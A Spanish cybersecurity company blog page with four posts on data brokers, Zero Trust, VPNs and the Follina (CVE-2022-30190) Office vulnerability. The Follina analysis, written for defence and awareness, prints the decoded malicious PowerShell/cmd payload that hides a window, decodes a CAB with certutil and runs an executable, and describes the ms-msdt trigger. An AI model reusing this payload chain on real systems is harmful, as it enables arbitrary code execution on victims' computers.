“Si algo es gratis, es porque tú eres el producto”. Es probable que hayas escuchado esta frase más de una vez. Cada vez que aceptamos los términos y condiciones de cualquier red social o servicio gratuito de internet, damos la autorización para que este servicio recopile datos sobre nosotros y nuestra actividad. ¿Para qué quieren nuestros datos? ¿Qué hacen con ellos?

Cada vez que navegamos en una página web o utilizamos una aplicación, la empresa responsable y terceros recopila tu actividad y los almacena en Data Warehouses para su posterior análisis. Gigantes como Google, Facebook y Twitter basan su negocio en el procesamiento y uso de los datos generados por sus usuarios, llegando a tal punto que Apple presumía de ser capaz de obtener un perfil médico de sus usuarios más detallado que el que podía tener la sanidad pública.

Obviamente estas empresas no pueden vender los datos de una persona o de un grupo reducido, pero hay otros negocios que se dedican a la venta de estos perfiles conocidos como Data Brokers.

 

¿Qué es un Data Broker?

Los Data Brokers se dedican a obtener información de individuos (ya sea por medios propios, investigando fuentes abiertas o comprando datos a otras empresas) y a su procesamiento para la generación de perfiles. Estos perfiles contienen datos demográficos (edad, profesión, lugar de residencia, etc.) y psicográficos (gustos, preferencias, rasgos de su personalidad y comportamiento, etc.) de individuos y/o grupos reducidos. Un Data Broker puede saber cuántos hijos tienes, la edad de estos, cuándo te has casado, cuándo te has divorciado (si han salido mal las cosas), tus ingresos, si te gusta algún deporte, el tiempo que pasas en redes sociales, si te gusta más una marca o consumes algún producto con frecuencia y mucho, mucho más.

Recolectan toda la información de fuentes públicas como censos, registros de automóviles, etc. y los cruzan con datos comprados a diferentes servicios como proveedores de tarjetas de crédito, tiendas minoristas, redes sociales y más.

 

 

¿Cómo se utilizan tus datos?

Estos perfiles elaborados no son difíciles de vender. Las empresas usan tu información comprada a los Data Brokers para multitud de cosas: anuncios personalizados, detectar si eres solvente ante un préstamo o hipoteca, probabilidad de tener un accidente o una enfermedad grave para una asegurada, etc.

Marketing y anuncios

“Es que nos escuchan, el otro día estaba hablo de X cosa y al día siguiente me apareció un anuncio de eso”. Más de una vez nos habrá pasado y esto es responsabilidad de los Data Brokers.

Es más sencillo que escuchar nuestras conversaciones, los Data Brokers compran tu historial de compra y el dinero que sueles gastar en cada momento. Además, los anunciantes estudian qué perfiles encajan como clientes potenciales.

Por ejemplo, un perfil de un joven varón de entre 18-35 años con un sueldo de más de 20.000 € viviendo en una localidad con poco transporte público tiene más posibilidades de comprar un coche nuevo con lo último en accesorios que otros perfiles.

Y no solo te estudian a ti, sino también con tus amigos, familia o conocidos. Si la gente con la que más interactúas en redes sociales se encuentra en localidades lejanas o tus familiares se encuentran en otra población, es probable que te salgan ofertas de viajes en avión o en bus.

Préstamos e hipotecas

Otro uso de tus datos se encuentra en los negocios de préstamos y banca. Para minimizar los riesgos de que alguien no pueda devolver un préstamo, bancos y más organizaciones dedicadas a estas actividades compran perfiles y analizan qué tipo de personas son más solventes y los que tienen mayor riesgo.

Un perfil que frecuenta páginas de casinos y apuestas tiene menos probabilidades de que le den un préstamo o una hipoteca con buenas condiciones que el resto.

Data Brokers y la RGPD

Mucha gente piensa que los Data Brokers son una amenaza contra los derechos a la privacidad y a la libertad (y con razón después del escándalo de Cambridge Analytica), pero no siempre. El sector de los Data Brokers está regularizado, sobre todo en el caso de Europa, gracias al Reglamento General de Protección de Datos (RGPD), que regula tanto la adquisición de la información como la cesión y el consentimiento por parte del usuario.

Pero en otros lugares como Asia y Estados Unidos la regularización es más laxa y flexible. Los Data Brokers operan en estas regiones para consumir datos que pueden aprovechar y hacer negocio en Europa sin que el RGPD se ponga de por medio, aunque esto último puede cambiar con el paso del tiempo después de los últimos acontecimientos con Facebook y Google.

 

 

Publicado el 26 de Agosto de 2022
Por Alberto López
Departamento de Ciberseguridad

Normalmente, en los hogares y en las oficinas tenemos una red local donde conectamos todos nuestros dispositivos: ordenadores, móviles, impresoras, IoT, NAS, etc.

Gracias a esta red local podemos interactuar con nuestros dispositivos sin exponerlos a Internet, por lo que pueden pensar que es un perímetro seguro el cual podemos confiar en los dispositivos que estén conectados a la red porque el acceso a la red está controlado, pero no es así.

 

Vamos a poner un ejemplo con una oficina: los equipos que tienen acceso a la red pueden usar la impresora, acceder a los archivos del servidor, usar la aplicación de la oficina, etc.

Cualquier agente externo como un hacker o un empleado descontento puede tener acceso a todo en cuanto haya ganado acceso a la red local y causar problemas. Por eso en estos últimos años, se ha dejado de pensar en el concepto de un perímetro seguro a una arquitectura Zero Trust.

 

¿Qué es Zero Trust?

Zero Trust es un modelo de seguridad informática con una premisa: “No confíes nunca, comprueba siempre”. Esta arquitectura necesita una verificación de identidad por cada usuario/dispositivo que quiera acceder a la red y realizar alguna operación dentro de ella.

Imaginémonos que la red de la oficina o de la casa fuera un edificio. Normalmente para proteger el edificio se ponen guardias en las entradas que son los que permiten el acceso a las personas (Un perímetro seguro), pero una vez dentro del edificio tienen total libertad y acceso a todos los recursos. Si un guardia deja pasar a algún actor malintencionado, puede abusar de sus privilegios dentro del perímetro para causar daño.

Una arquitectura Zero Trust no confía en nadie, ni de fuera ni de dentro del edificio. Cada vez que quieras entrar al edificio, ir a alguna habitación, acceder a algún recurso del edificio habrá un guarda que comprobará que eres tú y que tienes los permisos necesarios para realizar cualquier acción. Además, todas esas actividades y solicitudes quedan registradas, por lo que un acceso indebido o un intento de explotación por un agente malintencionado se puede detectar y encontrar su origen.

 

Fundamentos de la Seguridad Zero Trust

La seguridad Zero Trust se basa en estos fundamentos:

Asumir que todo es hostil

Este es el principio fundamental del Zero Trust: Por defecto, todo tráfico y actividad es hostil hasta que se demuestre lo contrario. Para demostrar que el tráfico no es malicioso y que viene de una fuente confiable, la fuente debe confirmar su identidad y de que esta identidad tiene los permisos suficientes para la operación.

Identificación y autorización

Para poder acceder a la red y a los recursos, debes demostrar que eres tú y que tienes permisos para realizar una acción. Esto se consigue a través de Identity and Access Managers (IAM). Un IAM es un recurso centralizado que ofrece servicios de identificación y de resolución de accesos. Antes de cualquier actividad, el usuario se identificará al IAM para demostrar que es un usuario confiable y cada vez que realiza una acción, el IAM procesa la acción y permitirá/denegará la acción dependiendo de los permisos del usuario.

Principio del mínimo privilegio

El principio de mínimo privilegio define que a cada usuario o proceso se le concede sólo los privilegios esenciales para realizar su función.Por ejemplo, un empleado de ventas tendrá acceso a los recursos de ventas, pero no a los recursos de contabilidad o de IT. Si un usuario o proceso es comprometido, limitará su capacidad y reducirá la superficie de ataque.

Logging y monitoreo

Todo movimiento y actividad queda registrado en el sistema. Gracias a esto, se puede hacer tareas de monitoreo para detectar y mitigar posibles actuaciones malintencionadas además de poder determinar su procedencia y alcance y ganar inteligencia para reforzar la seguridad de la red.

 

Ventajas de la Seguridad Zero Trust

Una infraestructura segura para el teletrabajo

Las organizaciones pueden desplegar servicios y recursos alcanzables desde internet pero solo accesibles para los miembros de la organización. Esto ayuda a los usuarios a poder realizar sus actividades desde casa o cualquier lado de forma segura sin exponer los servicios y recursos a internet y que cualquiera pueda acceder.

Mayor seguridad y herramientas para mitigar ataques

El departamento informático contaría con herramientas centralizadas para poder detectar ataques, definir políticas de seguridad, conceder/denegar permisos, rastrear actividades sospechosas, definir alarmas y avisos de acciones sospechosas, reportes más detallados, etc.

Mayor visibilidad de los recursos

Gracias al enfoque de Zero Trust de no confiar en nadie, la infraestructura es consciente de todos los recursos que se encuentran conectados, por lo que la organización tiene bien listados sus recursos y los detalles de estos . Gracias a esta visibilidad la organización es consciente de todos los recursos que posee y facilita las tareas de inventario y la simplificación de administración de IT.

 

 

Publicado el 29 de Julio de 2022
Por Alberto López
Departamento de Ciberseguridad

¿Qué es una VPN?

Una VPN (Virtual Private Network, en inglés) es una herramienta que establece una conexión de red segura cuando navegamos por internet. La VPN encripta todo nuestro tráfico que viaja a través de internet haciendo más difícil que un tercer actor robe nuestra información o rastree nuestra actividad.

 

¿Cómo funciona?

Cuando establecemos una conexión VPN lo que hacemos es realizar una conexión remota con el servidor de la VPN. Para ello, primero, nos autentificamos y el servidor utiliza una serie de protocolos para cifrar nuestros datos. Desde este instante todos los paquetes que enviamos irán cifrados en otro paquete externo mediante un proceso de encapsulación. Cuando los paquetes llegan a la VPN, esta elimina el paquete externo mediante un proceso de descifrado para acceder a los datos que contiene.

A partir de este momento el servidor remoto de la VPN se convierte en el origen de nuestros datos enviando nuestras peticiones. Cuando el servidor web responde a nuestra petición la VPN se encarga de cifrar los datos y enviárnoslo de nuevo.

 

Tipos de VPN

Los tipos de VPN que nos podemos encontrar son:

• VPNs de acceso remoto: son utilizadas por las empresas para establecer una conexión segura entre los recursos de la empresa y los dispositivos personales o de la compañía de los empleados. Una vez conectado los empleados pueden acceder a la información de la empresa sin tener que estar físicamente dentro de la red empresarial.
• VPNs punto a punto: ideales para grandes compañías que desean compartir información entre distintos usuarios situados en localizaciones diferentes. Pueden existir a su vez dos subtipos.
  • Intranet punto a punto: son útiles cuanto una empresa tiene oficinas en distintas localizaciones y se desean compartir información entre ambas.
  • Extranet punto a punto: similar a la anterior pero esta vez cuando se desean conectar intranets entre empresas distintas.
• Basadas en clientes: permiten al usuario conectarse a una red remota mediante una aplicación web. Por seguridad esta aplicación usa un método de autenticación. Útiles cuando se desea trabajar desde una red pública.

 

Beneficios de usar una VPN

Algunos de los beneficios más destacados que puede aportar el uso de una VPN son:

• Encriptación Segura: toda la información que mandamos a través de la VPN es encriptada. Para poder desencriptarla se necesita una clave. Sin la clave no nos pueden robar la información ya que mediante ataques de fuerza bruta llevaría millones de años desencriptar la información.
• Ocultar nuestra localización: en una VPN el servidor actúa como un proxy a internet. Dado que este servidor puede encontrarse en una localización distinta a la nuestra y este actúa como origen de los datos es imposible determinar a ciencia cierta nuestra localización.
• Saltarse restricciones geográficas: determinado contenido en internet es solo accesible para ciertas partes del mundo. Mediante VPN spoofing podríamos cambiarnos a un servidor ubicado en otra localización para poder acceder a ese contenido.

 

 

Publicado el 29 de Julio de 2022
Por Francisco Javier García
Departamento de Ciberseguridad

Nota 17/06/2022: Microsoft ya ha subido un parche para la vulnerabilidad CVE-2022-30190 “Follina” dentro de la actualización de Junio de Windows, Se recomienda actualizar los equipos cuanto antes.

En los últimos días de mayo de 2022, la comunidad de ciberseguridad ha hecho eco de una nueva vulnerabilidad que afecta al sistema operativo Windows y el paquete de ofimática Microsoft Office. Esta nueva vulnerabilidad CVE-2022-30190, bautizada como “Follina” es capaz de ejecutar código arbitrario en las últimas versiones de Windows y Office con solo un click o incluso con 0 clicks.

Todo empezó por un Tweet del grupo de investigación en Ciberseguridad nao_sec. Este grupo japonés estaba analizando un documento infectado que había sido subido en el portal VirusTotal (Un servicio gratuito que analiza archivos y URLs en busca de malware).

Como dice el tweet, dentro del documento .doc hay una referencia a un link externo a una URL que carga un archivo HTML y este es capaz de ejecutar código arbitrario en PowerShell.

El documento hace uso de una utilidad en Word que carga una plantilla en remoto y lo muestra en el documento. Esta utilidad lo que hace es cargar un archivo HTML que define la plantilla del documento alojado en un servidor remoto.

El actor hace una referencia a una URL donde tiene alojado un archivo HTML donde podemos destacar dos cosas:

• Hay un bloque de comentarios donde hay un montón de “A”s, aún no se sabe a ciencia cierta por qué es necesario pero esta entrada del blog de Bill Demirkapi indica que hay un Buffer de un tamaño fijo en una función que procesa el HTML, por lo que si el archivo es menor que 4096 bytes, no es capaz de iniciar el payload. Estas “A”s funcionan como relleno para que el archivo pase ese límite.
• Vemos que dentro del HTML, hay una referencia a una URI con un esquema que hace referencia al protocolo ms-msdt utilizado por el sistema operativo para ejecutar el solucionador de problemas de windows.

(Nota: en vez de poner http:// o https:// como en las URIs que todos conocemos, en esta URI contiene ms-msdt:/).

El esquema ms-msdt hace referencia al paquete PCWDiagnostics, más conocido como el “Solucionador de problemas” de Windows que se suele utilizar cuando no funciona el sonido o el WiFi..

Esa URI lanza el programa con una serie de parámetros. En uno de los parámetros vemos que usa sintaxis de PowerShell, donde se encuentra el payload codificado en Base64. Si lo decodificamos podemos ver lo que contiene:

$cmd = «c:\windows\system32\cmd.exe»; Start-Process $cmd -windowstyle hidden -ArgumentList «/c taskkill /f /im msdt.exe»; Start-Process $cmd -windowstyle hidden -ArgumentList «/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil – decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe»;

Estos comandos hacen lo siguiente:

• Abre una ventana oculta de cmd.exe.
  • Mata al proceso msdt.exe.
  • Hace un bucle de los archivos que se encuentra dentro de un archivo .rar buscando una cadena en Base64 que codifica un archivo CAB.
    • Guarda el archivo CAB codificado en Base64 como 1.t.
    • Decodifica el archivo CAB codificado en Base64 y lo guarda como 1.c.
    • Descomprime el archivo CAB 1.c en el directorio.
    • Y por último ejecuta rgb.exe que seguramente se encontraría dentro del archivo CAB.

(Nota: un archivo CAB (.cab) se refiere a un archivo Windows Cabinet cuyo contenido tiene datos comprimidos, parecido a los ZIP. en este caso el archivo CAB tenía dentro un archivo ejecutable llamado rgb.exe).

En resumen, un documento aparentemente inofensivo sería capaz de ejecutar código arbitrario en el equipo de la víctima, aunque éste lo vea en vista protegida. Y para empeorar las cosas, si en vez de un archivo de word .doc se trata de un archivo de Formato de Texto Enriquecido .rtf simplemente con ver en archivo dentro del explorador de Windows es capaz de ejecutar código arbitrario sin ningún click.

En esta prueba de concepto publicada por Benjamin Delpy podemos ver cómo es explotada esta vulnerabilidad. Nada más abrir el archivo .doc con las últimas versiones de Windows y Microsoft Office, podemos ver cómo se abre la ventana del solucionador de problemas y cómo después aparece la calculadora de Windows que ha sido lanzada por el payload.

Aún sin parche publicado por la gente de Microsoft, la únicas formas de mitigar este ataque es deshabilitar el protocolo MSDT como indican en esta publicación de Microsoft..

 

 

Esta vulnerabilidad ya catalogada como 0day afecta a las últimas versiones de Office y de Windows, por lo que en estos días se esperan una oleada de ataques por correo electrónico y otros medios utilizando estas técnicas, por lo que hay que tomar aún más precauciones con los mensajes que recibimos.

Referencias:

• https://twitter.com/nao_sec/status/1530196847679401984?s=20&t=DMjNT5ZNQTVi6LBD8Rxntg
• https://github.com/JohnHammond/msdt-follina
• https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug
• https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e

 

 

 

Publicado el 24 de Junio de 2022
Por Alberto López
Departamento de Ciberseguridad